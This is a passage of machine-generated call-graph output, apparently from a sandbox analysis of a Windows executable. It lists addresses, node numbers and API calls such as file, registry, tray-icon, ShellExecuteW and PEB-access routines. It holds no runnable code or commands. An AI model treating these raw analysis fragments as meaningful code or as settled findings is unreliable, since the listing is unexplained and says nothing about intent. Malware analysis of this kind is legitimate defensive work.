calls 99657->99658 99659 bef382 99658->99659 99660 bbfe0b 22 API calls 99659->99660 99661 bef397 99660->99661 99663 ba9abb 99662->99663 99667 ba9a4e 99662->99667 99669 bbe40f SetFilePointerEx 99663->99669 99665 ba9a7c 99665->99644 99666 ba9a8c ReadFile 99666->99665 99666->99667 99667->99665 99667->99666 99668->99644 99669->99667 99671 ba6ea3 99670->99671 99672 ba6f24 99670->99672 99671->99672 99674 ba6eaf 99671->99674 99673 ba93b2 22 API calls 99672->99673 99680 ba6ec1 __fread_nolock 99673->99680 99675 ba6eb9 99674->99675 99676 ba6ee7 99674->99676 99682 ba6f34 22 API calls 99675->99682 99677 bbfddb 22 API calls 99676->99677 99679 ba6ef1 99677->99679 99681 bbfe0b 22 API calls 99679->99681 99680->99654 99681->99680 99682->99680 99683->98555 99684->98559 99685->98558 99686->98566 99687->98566 99689 ba6270 22 API calls 99688->99689 99715 ba9eb5 99689->99715 99690 ba9fd2 99717 baa4a1 22 API calls __fread_nolock 99690->99717 99692 ba9fec 99692->98572 99695 baa6c3 22 API calls 99695->99715 99696 bef7c4 99722 c096e2 84 API calls __wsopen_s 99696->99722 99697 bef699 99702 bbfddb 22 API calls 99697->99702 99698 baa405 99698->99692 99724 c096e2 84 API calls __wsopen_s 99698->99724 99704 bef754 99702->99704 99703 bef7d2 99723 baa4a1 22 API calls __fread_nolock 99703->99723 99707 bbfe0b 22 API calls 99704->99707 99706 bef7e8 99706->99692 99709 baa12c __fread_nolock 99707->99709 99709->99696 99709->99698 99710 baa587 22 API calls 99710->99715 99711 baa4a1 22 API calls 99711->99715 99712 baaec9 22 API calls 99713 baa0db CharUpperBuffW 99712->99713 99718 baa673 22 API calls 99713->99718 99715->99690 99715->99695 99715->99696 99715->99697 99715->99698 99715->99709 99715->99710 99715->99711 99715->99712 99716 ba4573 41 API calls _wcslen 99715->99716 99719 ba48c8 23 API calls 99715->99719 99720 ba49bd 22 API calls __fread_nolock 99715->99720 99721 baa673 22 API calls 99715->99721 99716->99715 99717->99692 99718->99715 99719->99715 99720->99715 99721->99715 99722->99703 99723->99706 99724->99692 99726 c0dbdc GetFileAttributesW 99725->99726 99728 c0d4d5 99725->99728 99727 c0dbe8 FindFirstFileW 99726->99727 99726->99728 99727->99728 99729 c0dbf9 FindClose 99727->99729 99728->98314 99729->99728 99730 bd90fa 99731 bd9107 99730->99731 99735 bd911f 99730->99735 99780 bcf2d9 20 API calls __dosmaperr 99731->99780 99733 bd910c 99781 bd27ec 26 API calls __wsopen_s 99733->99781 99736 bd917a 99735->99736 99744 bd9117 99735->99744 99782 bdfdc4 21 API calls 2 library calls 99735->99782 99737 bcd955 __fread_nolock 26 API calls 99736->99737 99739 bd9192 99737->99739 99750 bd8c32 99739->99750 99741 bd9199 99742 bcd955 __fread_nolock 26 API calls 99741->99742 99741->99744 99743 bd91c5 99742->99743 99743->99744 99745 bcd955 __fread_nolock 26 API calls 99743->99745 99746 bd91d3 99745->99746 99746->99744 99747 bcd955 __fread_nolock 26 API calls 99746->99747 99748 bd91e3 99747->99748 99749 bcd955 __fread_nolock 26 API calls 99748->99749 99749->99744 99751 bd8c3e BuildCatchObjectHelperInternal 99750->99751 99752 bd8c5e 99751->99752 99753 bd8c46 99751->99753 99754 bd8d24 99752->99754 99758 bd8c97 99752->99758 99784 bcf2c6 20 API calls __dosmaperr 99753->99784 99791 bcf2c6 20 API calls __dosmaperr 99754->99791 99757 bd8c4b 99785 bcf2d9 20 API calls __dosmaperr 99757->99785 99761 bd8cbb 99758->99761 99762 bd8ca6 99758->99762 99759 bd8d29 99792 bcf2d9 20 API calls __dosmaperr 99759->99792 99783 bd5147 EnterCriticalSection 99761->99783 99786 bcf2c6 20 API calls __dosmaperr 99762->99786 99766 bd8cb3 99793 bd27ec 26 API calls __wsopen_s 99766->99793 99767 bd8cab 99787 bcf2d9 20 API calls __dosmaperr 99767->99787 99768 bd8cc1 99771 bd8cdd 99768->99771 99772 bd8cf2 99768->99772 99769 bd8c53 __wsopen_s 99769->99741 99788 bcf2d9 20 API calls __dosmaperr 99771->99788 99774 bd8d45 __fread_nolock 38 API calls 99772->99774 99776 bd8ced 99774->99776 99790 bd8d1c LeaveCriticalSection __wsopen_s 99776->99790 99777 bd8ce2 99789 bcf2c6 20 API calls __dosmaperr 99777->99789 99780->99733 99781->99744 99782->99736 99783->99768 99784->99757 99785->99769 99786->99767 99787->99766 99788->99777 99789->99776 99790->99769 99791->99759 99792->99766 99793->99769 99794 15723b0 99808 1570000 99794->99808 99796 1572476 99811 15722a0 99796->99811 99814 15734a0 GetPEB 99808->99814 99810 157068b 99810->99796 99812 15722a9 Sleep 99811->99812 99813 15722b7 99812->99813 99815 15734ca 99814->99815 99815->99810 99816 bc03fb 99817 bc0407 BuildCatchObjectHelperInternal 99816->99817 99845 bbfeb1 99817->99845 99819 bc040e 99820 bc0561 99819->99820 99823 bc0438 99819->99823 99872 bc083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 99820->99872 99822 bc0568 99873 bc4e52 28 API calls _abort 99822->99873 99832 bc0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 99823->99832 99856 bd247d 99823->99856 99825 bc056e 99874 bc4e04 28 API calls _abort 99825->99874 99829 bc0576 99830 bc0457 99835 bc04d8 99832->99835 99868 bc4e1a 38 API calls 3 library calls 99832->99868 99864 bc0959 99835->99864 99836 bc04de 99837 bc04f3 99836->99837 99869 bc0992 GetModuleHandleW 99837->99869 99839 bc04fa 99839->99822 99840 bc04fe 99839->99840 99841 bc0507 99840->99841 99870 bc4df5 28 API calls _abort 99840->99870 99871 bc0040 13 API calls 2 library calls 99841->99871 99844 bc050f 99844->99830 99846 bbfeba 99845->99846 99875 bc0698 IsProcessorFeaturePresent 99846->99875 99848 bbfec6 99876 bc2c94 10 API calls 3 library calls 99848->99876 99850 bbfecb 99851 bbfecf 99850->99851 99877 bd2317 99850->99877 99851->99819 99854 bbfee6 99854->99819 99859 bd2494 99856->99859 99857 bc0a8c _ValidateLocalCookies 5 API calls 99858 bc0451 99857->99858 99858->99830 99860 bd2421 99858->99860 99859->99857 99862 bd2450 99860->99862 99861 bc0a8c _ValidateLocalCookies 5 API calls 99863 bd2479 99861->99863 99862->99861 99863->99832 99893 bc2340 99864->99893 99867 bc097f 99867->99836 99868->99835 99869->99839 99870->99841 99871->99844 99872->99822 99873->99825 99874->99829 99875->99848 99876->99850 99881 bdd1f6 99877->99881 99880 bc2cbd 8 API calls 3 library calls 99880->99851 99884 bdd20f 99881->99884 99883 bbfed8 99883->99854 99883->99880 99885 bc0a8c 99884->99885 99886 bc0a95 99885->99886 99887 bc0a97 IsProcessorFeaturePresent 99885->99887 99886->99883 99889 bc0c5d 99887->99889 99892 bc0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 99889->99892 99891 bc0d40 99891->99883 99892->99891 99894 bc096c GetStartupInfoW 99893->99894 99894->99867 99895 ba1033 99900 ba4c91 99895->99900 99899 ba1042 99901 baa961 22 API calls 99900->99901 99902 ba4cff 99901->99902 99908 ba3af0 99902->99908 99904 ba4d9c 99906 ba1038 99904->99906 99911 ba51f7 22 API calls __fread_nolock 99904->99911 99907 bc00a3 29 API calls __onexit 99906->99907 99907->99899 99912 ba3b1c 99908->99912 99911->99904 99913 ba3b0f 99912->99913 99914 ba3b29 99912->99914 99913->99904 99914->99913 99915 ba3b30 RegOpenKeyExW 99914->99915 99915->99913 99916 ba3b4a RegQueryValueExW 99915->99916 99917 ba3b80 RegCloseKey 99916->99917 99918 ba3b6b 99916->99918 99917->99913 99918->99917 99919 bafe73 99926 bbceb1 99919->99926 99921 bafe89 99935 bbcf92 99921->99935 99923 bafeb3 99947 c1359c 82 API calls __wsopen_s 99923->99947 99925 bf4ab8 99927 bbcebf 99926->99927 99928 bbced2 99926->99928 99948 baaceb 23 API calls ISource 99927->99948 99930 bbced7 99928->99930 99931 bbcf05 99928->99931 99932 bbfddb 22 API calls 99930->99932 99949 baaceb 23 API calls ISource 99931->99949 99934 bbcec9 99932->99934 99934->99921 99936 ba6270 22 API calls 99935->99936 99937 bbcfc9 99936->99937 99938 ba9cb3 22 API calls 99937->99938 99940 bbcffa 99937->99940 99939 bfd166 99938->99939 99941 ba6350 22 API calls 99939->99941 99940->99923 99942 bfd171 99941->99942 99950 bbd2f0 40 API calls 99942->99950 99944 bfd184 99946 bfd188 99944->99946 99951 baaceb 23 API calls ISource 99944->99951 99946->99946 99947->99925 99948->99934 99949->99934 99950->99944 99951->99946 99952 badf10 99955 bab710 99952->99955 99956 bab72b 99955->99956 99957 bf00f8 99956->99957 99958 bf0146 99956->99958 99976 bab750 99956->99976 99961 bf0102 99957->99961 99964 bf010f 99957->99964 99957->99976 99997 c258a2 256 API calls 2 library calls 99958->99997 99995 c25d33 256 API calls 99961->99995 99975 baba20 99964->99975 99996 c261d0 256 API calls 2 library calls 99964->99996 99967 bf03d9 99967->99967 99971 baba4e 99972 bf0322 100000 c25c0c 82 API calls 99972->100000 99975->99971 100001 c1359c 82 API calls __wsopen_s 99975->100001 99976->99971 99976->99972 99976->99975 99981 bbd336 40 API calls 99976->99981 99982 babbe0 40 API calls 99976->99982 99983 baec40 256 API calls 99976->99983 99984 baa8c7 22 API calls 99976->99984 99986 baa81b 41 API calls 99976->99986 99987 bbd2f0 40 API calls 99976->99987 99988 bba01b 256 API calls 99976->99988 99989 bc0242 5 API calls __Init_thread_wait 99976->99989 99990 bbedcd 22 API calls 99976->99990 99991 bc00a3 29 API calls __onexit 99976->99991 99992 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99976->99992 99993 bbee53 82 API calls 99976->99993 99994 bbe5ca 256 API calls 99976->99994 99998 baaceb 23 API calls ISource 99976->99998 99999 bff6bf 23 API calls 99976->99999 99981->99976 99982->99976 99983->99976 99984->99976 99986->99976 99987->99976 99988->99976 99989->99976 99990->99976 99991->99976 99992->99976 99993->99976 99994->99976 99995->99964 99996->99975 99997->99976 99998->99976 99999->99976 100000->99975 100001->99967 100002 ba3156 100005 ba3170 100002->100005 100006 ba3187 100005->100006 100007 ba31eb 100006->100007 100008 ba318c 100006->100008 100045 ba31e9 100006->100045 100010 be2dfb 100007->100010 100011 ba31f1 100007->100011 100012 ba3199 100008->100012 100013 ba3265 PostQuitMessage 100008->100013 100009 ba31d0 DefWindowProcW 100047 ba316a 100009->100047 100054 ba18e2 10 API calls 100010->100054 100016 ba31f8 100011->100016 100017 ba321d SetTimer RegisterWindowMessageW 100011->100017 100014 be2e7c 100012->100014 100015 ba31a4 100012->100015 100013->100047 100069 c0bf30 34 API calls ___scrt_fastfail 100014->100069 100020 ba31ae 100015->100020 100021 be2e68 100015->100021 100024 be2d9c 100016->100024 100025 ba3201 KillTimer 100016->100025 100022 ba3246 CreatePopupMenu 100017->100022 100017->100047 100019 be2e1c 100055 bbe499 42 API calls 100019->100055 100027 be2e4d 100020->100027 100028 ba31b9 100020->100028 100068 c0c161 27 API calls ___scrt_fastfail 100021->100068 100022->100047 100030 be2dd7 MoveWindow 100024->100030 100031 be2da1 100024->100031 100050 ba30f2 Shell_NotifyIconW ___scrt_fastfail 100025->100050 100027->100009 100067 c00ad7 22 API calls 100027->100067 100035 ba31c4 100028->100035 100036 ba3253 100028->100036 100029 be2e8e 100029->100009 100029->100047 100030->100047 100037 be2dc6 SetFocus 100031->100037 100038 be2da7 100031->100038 100034 ba3263 100034->100047 100035->100009 100056 ba30f2 Shell_NotifyIconW ___scrt_fastfail 100035->100056 100052 ba326f 44 API calls ___scrt_fastfail 100036->100052 100037->100047 100038->100035 100041 be2db0 100038->100041 100039 ba3214 100051 ba3c50 DeleteObject DestroyWindow 100039->100051 100053 ba18e2 10 API calls 100041->100053 100045->100009 100048 be2e41 100057 ba3837 100048->100057 100050->100039 100051->100047 100052->100034 100053->100047 100054->100019 100055->100035 100056->100048 100058 ba3862 ___scrt_fastfail 100057->100058 100070 ba4212 100058->100070 100062 be3386 Shell_NotifyIconW 100063 ba3906 Shell_NotifyIconW 100074 ba3923 100063->100074 100065 ba391c 100065->100045 100066 ba38e8 100066->100062 100066->100063 100067->100045 100068->100034 100069->100029 100071 be35a4 100070->100071 100072 ba38b7 100070->100072 100071->100072 100073 be35ad DestroyIcon 100071->100073 100072->100066 100096 c0c874 42 API calls _strftime 100072->100096 100073->100072 100075 ba393f 100074->100075 100094 ba3a13 100074->100094 100076 ba6270 22 API calls 100075->100076 100077 ba394d 100076->100077 100078 ba395a 100077->100078 100079 be3393 LoadStringW 100077->100079 100080 ba6b57 22 API calls 100078->100080 100081 be33ad 100079->100081 100082 ba396f 100080->100082 100085 baa8c7 22 API calls 100081->100085 100089 ba3994 ___scrt_fastfail 100081->100089 100083 ba397c 100082->100083 100084 be33c9 100082->100084 100083->100081 100086 ba3986 100083->100086 100087 ba6350 22 API calls 100084->100087 100085->100089 100088 ba6350 22 API calls 100086->100088 100090 be33d7 100087->100090 100088->100089 100092 ba39f9 Shell_NotifyIconW 100089->100092 100090->100089 100091 ba33c6 22 API calls 100090->100091 100093 be33f9 100091->100093 100092->100094 100095 ba33c6 22 API calls 100093->100095 100094->100065 100095->100089 100096->100066 100097 ba2e37 100098 baa961 22 API calls 100097->100098 100099 ba2e4d 100098->100099 100176 ba4ae3 100099->100176 100101 ba2e6b 100102 ba3a5a 24 API calls 100101->100102 100103 ba2e7f 100102->100103 100104 ba9cb3 22 API calls 100103->100104 100105 ba2e8c 100104->100105 100106 ba4ecb 94 API calls 100105->100106 100107 ba2ea5 100106->100107 100108 ba2ead 100107->100108 100109 be2cb0 100107->100109 100113 baa8c7 22 API calls 100108->100113 100206 c12cf9 100109->100206 100111 be2cc3 100112 be2ccf 100111->100112 100114 ba4f39 68 API calls 100111->100114 100117 ba4f39 68 API calls 100112->100117 100115 ba2ec3 100113->100115 100114->100112 100190 ba6f88 22 API calls 100115->100190 100119 be2ce5 100117->100119 100118 ba2ecf 100120 ba9cb3 22 API calls 100118->100120 100232 ba3084 22 API calls 100119->100232 100121 ba2edc 100120->100121 100191 baa81b 41 API calls 100121->100191 100123 ba2eec 100126 ba9cb3 22 API calls 100123->100126 100125 be2d02 100233 ba3084 22 API calls 100125->100233 100128 ba2f12 100126->100128 100192 baa81b 41 API calls 100128->100192 100129 be2d1e 100131 ba3a5a 24 API calls 100129->100131 100132 be2d44 100131->100132 100234 ba3084 22 API calls 100132->100234 100133 ba2f21 100136 baa961 22 API calls 100133->100136 100135 be2d50 100137 baa8c7 22 API calls 100135->100137 100138 ba2f3f 100136->100138 100139 be2d5e 100137->100139 100193 ba3084 22 API calls 100138->100193 100235 ba3084 22 API calls 100139->100235 100141 ba2f4b 100194 bc4a28 40 API calls 3 library calls 100141->100194 100144 be2d6d 100148 baa8c7 22 API calls 100144->100148 100145 ba2f59 100145->100119 100146 ba2f63 100145->100146 100195 bc4a28 40 API calls 3 library calls 100146->100195 100149 be2d83 100148->100149 100236 ba3084 22 API calls 100149->100236 100150 ba2f6e 100150->100125 100152 ba2f78 100150->100152 100196 bc4a28 40 API calls 3 library calls 100152->100196 100153 be2d90 100155 ba2f83 100155->100129 100156 ba2f8d 100155->100156 100197 bc4a28 40 API calls 3 library calls 100156->100197 100158 ba2f98 100159 ba2fdc 100158->100159 100198 ba3084 22 API calls 100158->100198 100159->100144 100160 ba2fe8 100159->100160 100160->100153 100200 ba63eb 22 API calls 100160->100200 100162 ba2fbf 100164 baa8c7 22 API calls 100162->100164 100166 ba2fcd 100164->100166 100165 ba2ff8 100201 ba6a50 22 API calls 100165->100201 100199 ba3084 22 API calls 100166->100199 100169 ba3006 100202 ba70b0 23 API calls 100169->100202 100173 ba3021 100174 ba3065 100173->100174 100203 ba6f88 22 API calls 100173->100203 100204 ba70b0 23 API calls 100173->100204 100205 ba3084 22 API calls 100173->100205 100177 ba4af0 __wsopen_s 100176->100177 100178 ba6b57 22 API calls 100177->100178 100179 ba4b22 100177->100179 100178->100179 100180 ba4c6d 22 API calls 100179->100180 100189 ba4b58 100179->100189 100180->100179 100181 ba9cb3 22 API calls 100184 ba4c52 100181->100184 100182 ba4c5e 100182->100101 100183 ba9cb3 22 API calls 100183->100189 100186 ba515f 22 API calls 100184->100186 100185 ba4c6d 22 API calls 100185->100189 100186->100182 100187 ba515f 22 API calls 100187->100189 100188 ba4c29 100188->100181 100188->100182 100189->100183 100189->100185 100189->100187 100189->100188 100190->100118 100191->100123 100192->100133 100193->100141 100194->100145 100195->100150 100196->100155 100197->100158 100198->100162 100199->100159 100200->100165 100201->100169 100202->100173 100203->100173 100204->100173 100205->100173 100207 c12d15 100206->100207 100208 ba511f 64 API calls 100207->100208 100209 c12d29 100208->100209 100237 c12e66 75 API calls 100209->100237 100211 c12d3b 100212 ba50f5 40 API calls 100211->100212 100230 c12d3f 100211->100230 100213 c12d56 100212->100213 100214 ba50f5 40 API calls 100213->100214 100215 c12d66 100214->100215 100216 ba50f5 40 API calls 100215->100216 100217 c12d81 100216->100217 100218 ba50f5 40 API calls 100217->100218 100219 c12d9c 100218->100219 100220 ba511f 64 API calls 100219->100220 100221 c12db3 100220->100221 100222 bcea0c ___std_exception_copy 21 API calls 100221->100222 100223 c12dba 100222->100223 100224 bcea0c ___std_exception_copy 21 API calls 100223->100224 100225 c12dc4 100224->100225 100226 ba50f5 40 API calls 100225->100226 100227 c12dd8 100226->100227 100238 c128fe 27 API calls 100227->100238 100229 c12dee 100229->100230 100231 c122ce 79 API calls 100229->100231 100230->100111 100231->100230 100232->100125 100233->100129 100234->100135 100235->100144 100236->100153 100237->100211 100238->100229 100239 ba1cad SystemParametersInfoW 100240 ba2de3 100241 ba2df0 __wsopen_s 100240->100241 100242 ba2e09 100241->100242 100243 be2c2b ___scrt_fastfail 100241->100243 100244 ba3aa2 23 API calls 100242->100244 100245 be2c47 GetOpenFileNameW 100243->100245 100246 ba2e12 100244->100246 100247 be2c96 100245->100247 100256 ba2da5 100246->100256 100250 ba6b57 22 API calls 100247->100250 100252 be2cab 100250->100252 100252->100252 100253 ba2e27 100274 ba44a8 100253->100274 100257 be1f50 __wsopen_s 100256->100257 100258 ba2db2 GetLongPathNameW 100257->100258 100259 ba6b57 22 API calls 100258->100259 100260 ba2dda 100259->100260 100261 ba3598 100260->100261 100262 baa961 22 API calls 100261->100262 100263 ba35aa 100262->100263 100264 ba3aa2 23 API calls 100263->100264 100265 ba35b5 100264->100265 100266 ba35c0 100265->100266 100271 be32eb 100265->100271 100267 ba515f 22 API calls 100266->100267 100269 ba35cc 100267->100269 100303 ba35f3 100269->100303 100272 be330d 100271->100272 100309 bbce60 41 API calls 100271->100309 100273 ba35df 100273->100253 100275 ba4ecb 94 API calls 100274->100275 100276 ba44cd 100275->100276 100277 be3833 100276->100277 100279 ba4ecb 94 API calls 100276->100279 100278 c12cf9 80 API calls 100277->100278 100280 be3848 100278->100280 100281 ba44e1 100279->100281 100282 be384c 100280->100282 100283 be3869 100280->100283 100281->100277 100284 ba44e9 100281->100284 100285 ba4f39 68 API calls 100282->100285 100286 bbfe0b 22 API calls 100283->100286 100287 be3854 100284->100287 100288 ba44f5 100284->100288 100285->100287 100302 be38ae 100286->100302 100311 c0da5a 82 API calls 100287->100311 100310 ba940c 136 API calls 2 library calls 100288->100310 100291 be3862 100291->100283 100292 ba2e31 100293 ba4f39 68 API calls 100296 be3a5f 100293->100296 100296->100293 100317 c0989b 82 API calls __wsopen_s 100296->100317 100299 ba9cb3 22 API calls 100299->100302 100302->100296 100302->100299 100312 c0967e 22 API calls __fread_nolock 100302->100312 100313 c095ad 42 API calls _wcslen 100302->100313 100314 c10b5a 22 API calls 100302->100314 100315 baa4a1 22 API calls __fread_nolock 100302->100315 100316 ba3ff7 22 API calls 100302->100316 100304 ba3605 100303->100304 100308 ba3624 __fread_nolock 100303->100308 100306 bbfe0b 22 API calls 100304->100306 100305 bbfddb 22 API calls 100307 ba363b 100305->100307 100306->100308 100307->100273 100308->100305 100309->100271 100310->100292 100311->100291 100312->100302 100313->100302 100314->100302 100315->100302 100316->100302 100317->100296 100318 be2ba5 100319 be2baf 100318->100319 100320 ba2b25 100318->100320 100322 ba3a5a 24 API calls 100319->100322 100346 ba2b83 7 API calls 100320->100346 100324 be2bb8 100322->100324 100326 ba9cb3 22 API calls 100324->100326 100328 be2bc6 100326->100328 100327 ba2b2f 100332 ba3837 49 API calls 100327->100332 100333 ba2b44 100327->100333 100329 be2bce 100328->100329 100330 be2bf5 100328->100330 100334 ba33c6 22 API calls 100329->100334 100331 ba33c6 22 API calls 100330->100331 100335 be2bf1 GetForegroundWindow ShellExecuteW 100331->100335 100332->100333 100338 ba2b5f 100333->100338 100350 ba30f2 Shell_NotifyIconW ___scrt_fastfail 100333->100350 100336 be2bd9 100334->100336 100340 be2c26 100335->100340 100339 ba6350 22 API calls 100336->100339 100344 ba2b66 SetCurrentDirectoryW 100338->100344 100342 be2be7 100339->100342 100340->100338 100343 ba33c6 22 API calls 100342->100343 100343->100335 100345 ba2b7a 100344->100345 100351 ba2cd4 7 API calls 100346->100351 100348 ba2b2a 100349 ba2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 100348->100349 100349->100327 100350->100338 100351->100348 100352 ba1044 100357 ba10f3 100352->100357 100354 ba104a 100393 bc00a3 29 API calls __onexit 100354->100393 100356 ba1054 100394 ba1398 100357->100394 100361 ba116a 100362 baa961 22 API calls 100361->100362 100363 ba1174 100362->100363 100364 baa961 22 API calls 100363->100364 100365 ba117e 100364->100365 100366 baa961 22 API calls 100365->100366 100367 ba1188 100366->100367 100368 baa961 22 API calls 100367->100368 100369 ba11c6 100368->100369 100370 baa961 22 API calls 100369->100370 100371 ba1292 100370->100371 100404 ba171c 100371->100404 100375 ba12c4 100376 baa961 22 API calls 100375->100376 100377 ba12ce 100376->100377 100378 bb1940 9 API calls 100377->100378 100379 ba12f9 100378->100379 100425 ba1aab 100379->100425 100381 ba1315 100382 ba1325 GetStdHandle 100381->100382 100383 ba137a 100382->100383 100384 be2485 100382->100384 100387 ba1387 OleInitialize 100383->100387 100384->100383 100385 be248e 100384->100385 100386 bbfddb 22 API calls 100385->100386 100388 be2495 100386->100388 100387->100354 100432 c1011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 100388->100432 100390 be249e 100433 c10944 CreateThread 100390->100433 100392 be24aa CloseHandle 100392->100383 100393->100356 100434 ba13f1 100394->100434 100397 ba13f1 22 API calls 100398 ba13d0 100397->100398 100399 baa961 22 API calls 100398->100399 100400 ba13dc 100399->100400 100401 ba6b57 22 API calls 100400->100401 100402 ba1129 100401->100402 100403 ba1bc3 6 API calls 100402->100403 100403->100361 100405 baa961 22 API calls 100404->100405 100406 ba172c 100405->100406 100407 baa961 22 API calls 100406->100407 100408 ba1734 100407->100408 100409 baa961 22 API calls 100408->100409 100410 ba174f 100409->100410 100411 bbfddb 22 API calls 100410->100411 100412 ba129c 100411->100412 100413 ba1b4a 100412->100413 100414 ba1b58 100413->100414 100415 baa961 22 API calls 100414->100415 100416 ba1b63 100415->100416 100417 baa961 22 API calls 100416->100417 100418 ba1b6e 100417->100418 100419 baa961 22 API calls 100418->100419 100420 ba1b79 100419->100420 100421 baa961 22 API calls 100420->100421 100422 ba1b84 100421->100422 100423 bbfddb 22 API calls 100422->100423 100424 ba1b96 RegisterWindowMessageW 100423->100424 100424->100375 100426 ba1abb 100425->100426 100427 be272d 100425->100427 100428 bbfddb 22 API calls 100426->100428 100441 c13209 23 API calls 100427->100441 100430 ba1ac3 100428->100430 100430->100381 100431 be2738 100432->100390 100433->100392 100442 c1092a 28 API calls 100433->100442 100435 baa961 22 API calls 100434->100435 100436 ba13fc 100435->100436 100437 baa961 22 API calls 100436->100437 100438 ba1404 100437->100438 100439 baa961 22 API calls 100438->100439 100440 ba13c6 100439->100440 100440->100397 100441->100431 100443 bf2a00 100447 bad7b0 ISource 100443->100447 100444 bad9d5 100445 badb11 PeekMessageW 100445->100447 100446 bad807 GetInputState 100446->100445 100446->100447 100447->100444 100447->100445 100447->100446 100448 bf1cbe TranslateAcceleratorW 100447->100448 100450 badb8f PeekMessageW 100447->100450 100451 badb73 TranslateMessage DispatchMessageW 100447->100451 100452 bada04 timeGetTime 100447->100452 100453 badbaf Sleep 100447->100453 100454 bf2b74 Sleep 100447->100454 100455 bf1dda timeGetTime 100447->100455 100471 baec40 256 API calls 100447->100471 100473 bb1310 256 API calls 100447->100473 100475 badd50 100447->100475 100482 badfd0 100447->100482 100505 babf40 256 API calls 2 library calls 100447->100505 100506 bbedf6 IsDialogMessageW GetClassLongW 100447->100506 100508 c13a2a 23 API calls 100447->100508 100509 c1359c 82 API calls __wsopen_s 100447->100509 100448->100447 100450->100447 100451->100450 100452->100447 100459 badbc0 100453->100459 100454->100459 100507 bbe300 23 API calls 100455->100507 100456 bbe551 timeGetTime 100456->100459 100459->100444 100459->100447 100459->100456 100460 bf2c0b GetExitCodeProcess 100459->100460 100461 c329bf GetForegroundWindow 100459->100461 100465 bf2a31 100459->100465 100466 bf2ca9 Sleep 100459->100466 100510 c25658 23 API calls 100459->100510 100511 c0e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 100459->100511 100512 c0d4dc 47 API calls 100459->100512 100463 bf2c37 CloseHandle 100460->100463 100464 bf2c21 WaitForSingleObject 100460->100464 100461->100459 100463->100459 100464->100447 100464->100463 100465->100444 100466->100447 100471->100447 100473->100447 100476 badd6f 100475->100476 100477 badd83 100475->100477 100513 bad260 256 API calls 2 library calls 100476->100513 100514 c1359c 82 API calls __wsopen_s 100477->100514 100479 badd7a 100479->100447 100481 bf2f75 100481->100481 100483 bae010 100482->100483 100499 bae0dc ISource 100483->100499 100517 bc0242 5 API calls __Init_thread_wait 100483->100517 100486 bf2fca 100488 baa961 22 API calls 100486->100488 100486->100499 100487 baa961 22 API calls 100487->100499 100491 bf2fe4 100488->100491 100518 bc00a3 29 API calls __onexit 100491->100518 100494 c1359c 82 API calls 100494->100499 100495 bf2fee 100519 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100495->100519 100498 baa8c7 22 API calls 100498->100499 100499->100487 100499->100494 100499->100498 100500 baec40 256 API calls 100499->100500 100501 bae3e1 100499->100501 100502 bb04f0 22 API calls 100499->100502 100515 baa81b 41 API calls 100499->100515 100516 bba308 256 API calls 100499->100516 100520 bc0242 5 API calls __Init_thread_wait 100499->100520 100521 bc00a3 29 API calls __onexit 100499->100521 100522 bc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100499->100522 100523 c247d4 256 API calls 100499->100523 100524 c268c1 256 API calls 100499->100524 100500->100499 100501->100447 100502->100499 100505->100447 100506->100447 100507->100447 100508->100447 100509->100447 100510->100459 100511->100459 100512->100459 100513->100479 100514->100481 100515->100499 100516->100499 100517->100486 100518->100495 100519->100499 100520->100499 100521->100499 100522->100499 100523->100499 100524->100499 100525 bd8402 100530 bd81be 100525->100530 100529 bd842a 100535 bd81ef try_get_first_available_module 100530->100535 100532 bd83ee 100549 bd27ec 26 API calls __wsopen_s 100532->100549 100534 bd8343 100534->100529 100542 be0984 100534->100542 100538 bd8338 100535->100538 100545 bc8e0b 40 API calls 2 library calls 100535->100545 100537 bd838c 100537->100538 100546 bc8e0b 40 API calls 2 library calls 100537->100546 100538->100534 100548 bcf2d9 20 API calls __dosmaperr 100538->100548 100540 bd83ab 100540->100538 100547 bc8e0b 40 API calls 2 library calls 100540->100547 100550 be0081 100542->100550 100544 be099f 100544->100529 100545->100537 100546->100540 100547->100538 100548->100532 100549->100534 100551 be008d BuildCatchObjectHelperInternal 100550->100551 100552 be009b 100551->100552 100554 be00d4 100551->100554 100608 bcf2d9 20 API calls __dosmaperr 100552->100608 100561 be065b 100554->100561 100555 be00a0 100609 bd27ec 26 API calls __wsopen_s 100555->100609 100560 be00aa __wsopen_s 100560->100544 100611 be042f 100561->100611 100564 be068d 100643 bcf2c6 20 API calls __dosmaperr 100564->100643 100565 be06a6 100629 bd5221 100565->100629 100568 be06ab 100570 be06cb 100568->100570 100571 be06b4 100568->100571 100569 be0692 100644 bcf2d9 20 API calls __dosmaperr 100569->100644 100642 be039a CreateFileW 100570->100642 100645 bcf2c6 20 API calls __dosmaperr 100571->100645 100575 be06b9 100646 bcf2d9 20 API calls __dosmaperr 100575->100646 100577 be0781 GetFileType 100578 be078c GetLastError 100577->100578 100579 be07d3 100577->100579 100649 bcf2a3 20 API calls __dosmaperr 100578->100649 100651 bd516a 21 API calls 2 library calls 100579->100651 100580 be0756 GetLastError 100648 bcf2a3 20 API calls __dosmaperr 100580->100648 100582 be0704 100582->100577 100582->100580 100647 be039a CreateFileW 100582->100647 100584 be079a CloseHandle 100584->100569 100586 be07c3 100584->100586 100650 bcf2d9 20 API calls __dosmaperr 100586->100650 100588 be0749 100588->100577 100588->100580 100590 be07f4 100592 be0840 100590->100592 100652 be05ab 72 API calls 3 library calls 100590->100652 100591 be07c8 100591->100569 100596 be086d 100592->100596 100653 be014d 72 API calls 4 library calls 100592->100653 100595 be0866 100595->100596 100597 be087e 100595->100597 100598 bd86ae __wsopen_s 29 API calls 100596->100598 100599 be00f8 100597->100599 100600 be08fc CloseHandle 100597->100600 100598->100599 100610 be0121 LeaveCriticalSection __wsopen_s 100599->100610 100654 be039a CreateFileW 100600->100654 100602 be0927 100603 be095d 100602->100603 100604 be0931 GetLastError 100602->100604 100603->100599 100655 bcf2a3 20 API calls __dosmaperr 100604->100655 100606 be093d 100656 bd5333 21 API calls 2 library calls 100606->100656 100608->100555 